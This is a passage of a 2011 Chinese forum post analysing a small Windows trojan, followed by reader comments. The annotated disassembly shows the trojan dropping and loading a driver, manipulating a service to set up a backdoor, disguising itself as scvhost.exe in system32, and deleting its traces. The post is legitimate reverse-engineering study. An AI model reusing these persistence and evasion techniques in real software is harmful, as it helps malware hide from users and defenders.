0040159D 8B45 08       mov    eax, dword ptr [ebp+8]
004015A0 5E             pop    esi
004015A1 8BE5          mov    esp, ebp
004015A3 5D             pop    ebp
004015A4 C3             retn

}
11.继续分析，貌似又生成了什么东西，看：
004026D8 8D8424 74080000 lea    eax, dword ptr [esp+874]          \??\C:\WINDOWS\Explorer.EXE
004026DF 8D8C24 74040000 lea    ecx, dword ptr [esp+474]
004026E6 50             push eax
004026E7 51             push ecx
004026E8 E8 63EFFFFF    call 00401650             这个call也在做坏事，果断CALL进去
{
00401650 81EC 30020000 sub    esp, 230
00401656 8A0D C0124000 mov    cl, byte ptr [4012C0]
0040165C B0 5C          mov    al, 5C
0040165E 884424 00    mov    byte ptr [esp], al
00401662 884424 01    mov    byte ptr [esp+1], al
00401666 884424 03    mov    byte ptr [esp+3], al
0040166A B0 70          mov    al, 70
0040166C 884424 04    mov    byte ptr [esp+4], al
00401670 884424 0A    mov    byte ptr [esp+A], al
00401674 A1 BC124000    mov    eax, dword ptr [4012BC]
00401679 57             push edi
0040167A 894424 1C    mov    dword ptr [esp+1C], eax
0040167E 884C24 20    mov    byte ptr [esp+20], cl
00401682 B9 3F000000    mov    ecx, 3F
00401687 33C0          xor    eax, eax
00401689 8D7C24 34    lea    edi, dword ptr [esp+34]
0040168D 6A 00          push 0
0040168F F3:AB          rep    stos dword ptr es:[edi]
00401691 66:AB          stos word ptr es:[edi]
00401693 AA             stos byte ptr es:[edi]
00401694 B9 3F000000    mov    ecx, 3F
00401699 33C0          xor    eax, eax
0040169B 8DBC24 38010000 lea    edi, dword ptr [esp+138]
004016A2 68 80000000    push 80
004016A7 F3:AB          rep    stos dword ptr es:[edi]
004016A9 6A 03          push 3
004016AB 6A 00          push 0
004016AD 66:AB          stos word ptr es:[edi]
004016AF 6A 00          push 0
004016B1 8D5424 18    lea    edx, dword ptr [esp+18]
004016B5 68 000000C0    push C0000000
004016BA 52             push edx
004016BB C64424 22 2E mov    byte ptr [esp+22], 2E
004016C0 C64424 25 63 mov    byte ptr [esp+25], 63
004016C5 C64424 26 69 mov    byte ptr [esp+26], 69
004016CA C64424 27 64 mov    byte ptr [esp+27], 64
004016CF C64424 28 75 mov    byte ptr [esp+28], 75
004016D4 C64424 29 6D mov    byte ptr [esp+29], 6D
004016D9 C64424 2B 00 mov    byte ptr [esp+2B], 0
004016DE AA             stos byte ptr es:[edi]
004016DF FF15 88104000 call dword ptr [401088]             生成刚刚的驱动文件pcidump
004016E5 8BF8          mov    edi, eax
004016E7 85FF          test edi, edi
004016E9 0F84 2D010000 je    0040181C
004016EF A0 78124000    mov    al, byte ptr [401278]
004016F4 53             push ebx
004016F5 55             push ebp
004016F6 8BAC24 40020000 mov    ebp, dword ptr [esp+240]
004016FD 56             push esi
004016FE 8B35 8C104000 mov    esi, dword ptr [40108C]       ; kernel32.lstrcpyA
00401704 84C0          test al, al
00401706 0F84 A8000000 je    004017B4
0040170C 8B0D B0124000 mov    ecx, dword ptr [4012B0]
00401712 A1 AC124000    mov    eax, dword ptr [4012AC]
00401717 8B15 B4124000 mov    edx, dword ptr [4012B4]
0040171D 894C24 34    mov    dword ptr [esp+34], ecx
00401721 894424 30    mov    dword ptr [esp+30], eax
00401725 A1 B8124000    mov    eax, dword ptr [4012B8]
0040172A 8D8C24 40010000 lea    ecx, dword ptr [esp+140]
00401731 68 FF000000    push 0FF
00401736 51             push ecx
00401737 895424 40    mov    dword ptr [esp+40], edx
0040173B 894424 44    mov    dword ptr [esp+44], eax
0040173F FF15 90104000 call dword ptr [401090]             ; kernel32.GetSystemDirectoryA
00401745 8D5424 28    lea    edx, dword ptr [esp+28]
00401749 8D4424 40    lea    eax, dword ptr [esp+40]
0040174D 52             push edx
0040174E 50             push eax
0040174F FFD6          call esi
00401751 8B1D 94104000 mov    ebx, dword ptr [401094]       ; kernel32.lstrcatA
00401757 8D8C24 40010000 lea    ecx, dword ptr [esp+140]
0040175E 8D5424 40    lea    edx, dword ptr [esp+40]
00401762 51             push ecx
00401763 52             push edx
00401764 FFD3          call ebx
00401766 8D4424 30    lea    eax, dword ptr [esp+30]
0040176A 8D4C24 40    lea    ecx, dword ptr [esp+40]
0040176E 50             push eax
0040176F 51             push ecx
00401770 FFD3          call ebx                      "\??\C:\WINDOWS\system32\drivers\gm.dls"此路径
00401772 55             push ebp
00401773 68 E8104000    push 004010E8                      ; ASCII "123321"
00401778 FFD6          call esi
0040177A 8D5424 40    lea    edx, dword ptr [esp+40]
0040177E 52             push edx
0040177F 68 B0114000    push 004011B0
00401784 FFD6          call esi
00401786 8D4424 1C    lea    eax, dword ptr [esp+1C]
0040178A 6A 00          push 0
0040178C 50             push eax
0040178D 6A 00          push 0
0040178F 6A 00          push 0
00401791 8D4C24 30    lea    ecx, dword ptr [esp+30]
00401795 6A 08          push 8
00401797 51             push ecx
00401798 68 14202200    push 222014
0040179D 57             push edi
0040179E C74424 40 E8104>mov    dword ptr [esp+40], 004010E8    ; ASCII "123321"
004017A6 C74424 44 B0114>mov    dword ptr [esp+44], 004011B0
004017AE FF15 98104000 call dword ptr [401098]             对设备进行指定的操作
004017B4 8B1D 9C104000 mov    ebx, dword ptr [40109C]       ; kernel32.Sleep
004017BA 68 B80B0000    push 0BB8
004017BF FFD3          call ebx
004017C1 8B9424 48020000 mov    edx, dword ptr [esp+248]
004017C8 52             push edx
004017C9 68 E8104000    push 004010E8                      ; ASCII "123321"
004017CE FFD6          call esi
004017D0 55             push ebp
004017D1 68 B0114000    push 004011B0
004017D6 FFD6          call esi
004017D8 8D4424 1C    lea    eax, dword ptr [esp+1C]
004017DC 6A 00          push 0
004017DE 50             push eax
004017DF 6A 00          push 0
004017E1 6A 00          push 0
004017E3 8D4C24 30    lea    ecx, dword ptr [esp+30]
004017E7 6A 08          push 8
004017E9 51             push ecx
004017EA 68 14202200    push 222014
004017EF 57             push edi
004017F0 C74424 40 E8104>mov    dword ptr [esp+40], 004010E8    ; ASCII "123321"
004017F8 C74424 44 B0114>mov    dword ptr [esp+44], 004011B0
00401800 FF15 98104000 call dword ptr [401098]             DeviceIoControl
{
0012F254 000002B8  |hDevice = 000002B8
0012F258 00222014  |IoControlCode = 222014
0012F25C 0012F294  |InBuffer = 0012F294
0012F260 00000008  |InBufferSize = 8
0012F264 00000000  |OutBuffer = NULL
0012F268 00000000  |OutBufferSize = 0
0012F26C 0012F290  |pBytesReturned = 0012F290
0012F270 00000000  \pOverlapped = NULL
}
00401806 68 B80B0000    push 0BB8
0040180B 33F6          xor    esi, esi
0040180D FFD3          call ebx
0040180F 8BC6          mov    eax, esi
00401811 5E             pop    esi
00401812 5D             pop    ebp
00401813 5B             pop    ebx
00401814 5F             pop    edi
00401815 81C4 30020000 add    esp, 230
0040181B C3             retn
0040181C 8B4424 10    mov    eax, dword ptr [esp+10]
00401820 5F             pop    edi
00401821 81C4 30020000 add    esp, 230
00401827 C3             retn

}
004026ED 8D9424 78020000 lea    edx, dword ptr [esp+278]
004026F4 52             push edx                "C:\WINDOWS\system32\drivers\pcidump.sys"
004026F5 E8 B6EEFFFF    call 004015B0       这个call进去看看。。。开启服务，创建后门呢
{
004015B0 83EC 24       sub    esp, 24
004015B3 57             push edi
004015B4 6A 02          push 2
004015B6 B0 70          mov    al, 70
004015B8 6A 00          push 0
004015BA 6A 00          push 0
004015BC 884424 10    mov    byte ptr [esp+10], al
004015C0 C64424 11 63 mov    byte ptr [esp+11], 63
004015C5 C64424 12 69 mov    byte ptr [esp+12], 69
004015CA C64424 13 64 mov    byte ptr [esp+13], 64
004015CF C64424 14 75 mov    byte ptr [esp+14], 75
004015D4 C64424 15 6D mov    byte ptr [esp+15], 6D
004015D9 884424 16    mov    byte ptr [esp+16], al
004015DD C64424 17 00 mov    byte ptr [esp+17], 0
004015E2 FF15 14104000 call dword ptr [401014]             打开服务管理器
004015E8 8BF8          mov    edi, eax
004015EA 85FF          test edi, edi
004015EC 74 3C          je    short 0040162A
004015EE 53             push ebx
004015EF 56             push esi
004015F0 8D4424 0C    lea    eax, dword ptr [esp+C]
004015F4 68 20000100    push 10020                         ; UNICODE "PROFILE=C:\Documents and Settings\All Users"
004015F9 50             push eax
004015FA 57             push edi
004015FB FF15 0C104000 call dword ptr [40100C]             打开服务
00401601 8B1D 00104000 mov    ebx, dword ptr [401000]       关闭
00401607 8BF0          mov    esi, eax
00401609 85F6          test esi, esi
0040160B 74 18          je    short 00401625
0040160D 8D4C24 14    lea    ecx, dword ptr [esp+14]
00401611 51             push ecx
00401612 6A 01          push 1
00401614 56             push esi
00401615 FF15 08104000 call dword ptr [401008]             control
0040161B 56             push esi
0040161C FF15 04104000 call dword ptr [401004]             删除
00401622 56             push esi
00401623 FFD3          call ebx
00401625 57             push edi
00401626 FFD3          call ebx
00401628 5E             pop    esi
00401629 5B             pop    ebx
0040162A 68 F4010000    push 1F4
0040162F FF15 9C104000 call dword ptr [40109C]             ; kernel32.Sleep
00401635 8B5424 2C    mov    edx, dword ptr [esp+2C]
00401639 52             push edx
0040163A FF15 A0104000 call dword ptr [4010A0]             删除
00401640 5F             pop    edi
00401641 83C4 24       add    esp, 24
00401644 C3             retn

}

12.伪造一个scvhost.exe在C:\WINDOWS\SYSTEM32路径下：
004027A2 8D9424 70010000 lea    edx, dword ptr [esp+170]          C:\WINDOWS\system32\scvhost.exe
004027A9 6A 01          push 1
004027AB 8D4424 74    lea    eax, dword ptr [esp+74]
004027AF 52             push edx
004027B0 50             push eax
004027B1 FF15 70104000 call dword ptr [401070]                      转移文件MoveFileExA
{
0012F4B4 0012F530  |ExistingName = "C:\Documents and Settings\Administrator\",D7,"烂鎈zuo\zuo.exe"
0012F4B8 0012F630  |NewName = "C:\WINDOWS\system32\scvhost.exe"
0012F4BC 00000001  \Flags = REPLACE_EXISTING
}
004027B7 8B35 48104000 mov    esi, dword ptr [401048]
004027BD 8D8C24 70010000 lea    ecx, dword ptr [esp+170]
004027C4 8D5424 70    lea    edx, dword ptr [esp+70]
004027C8 51             push ecx
004027C9 52             push edx
004027CA FFD6          call esi
004027CC 85C0          test eax, eax
004027CE 74 18          je    short 004027E8
004027D0 8D8424 74050000 lea    eax, dword ptr [esp+574]
004027D7 8D4C24 70    lea    ecx, dword ptr [esp+70]
004027DB 50             push eax
004027DC 51             push ecx
004027DD FFD6          call esi
004027DF 85C0          test eax, eax
004027E1 74 05          je    short 004027E8
004027E3 E8 88F3FFFF    call 00401B70                进行各种删除操作和隐藏操作，其中还创建了一个k78a.dat的批处理，退出
004027E8 5F             pop    edi
004027E9 5E             pop    esi
004027EA 5D             pop    ebp
004027EB 33C0          xor    eax, eax
004027ED 5B             pop    ebx
004027EE 81C4 680B0000 add    esp, 0B68
004027F4 C2 1000       retn 10

哈，终于分析完了，木马虽小，但五脏俱全，总结一下，首先创建互斥量，然后根据启动运行的时间来生成两个文件（一个dll，一个exe），创建驱动，加载驱动
创建服务，建立后门，最后的时候还不忘了删除痕迹哈，不错不错。
额，不会添加代码的那种，看起来就有点乱，纠结了。。。。
菜菜的第一次相当于，有失误之处，还请同学们之处，共同进步哈！
当初加入LSG，现在就要为了自己的理想而奋斗，加油！
既然选择了远方，便只顾风雨简兼程！！！

s0s0 · 发表于 2011-7-12 01:55

好高深吖..

哀而不伤 · 发表于 2011-3-29 17:43

老大你的汇编的技术好强啊！！！！！！

wei123 · 发表于 2011-4-9 23:00

好，是盗号的还是做什么用的

nbw · 发表于 2011-4-28 09:47

启发式是说杀软吧？加载个驱动就叫启发式，是不是我落伍了

曹无咎 · 发表于 2011-4-28 13:33

回复 nbw 的帖子

嗯，这个是我搞错了，启发式应该是还没有存入病毒库的病毒吧，谢谢大侠不吝赐教！！

Minho · 发表于 2011-5-13 21:42

本人菜鸟，请教楼主，做出这样的分析需要精通哪些方面的知识

zhaokang · 发表于 2011-5-28 14:35

扎实的编程功底，逆向自然水到渠成{:1_912:}

gulei_zt · 发表于 2011-7-12 01:50

好复杂啊慢慢学了

tanke · 发表于 2011-8-7 22:34

我是外行，有懂的说说需要看那些书？

帐号		自动登录	找回密码
密码			注册[Register]

[PC样本分析] 对一款小木马的分析 by 曹无咎[LSG]

免费评分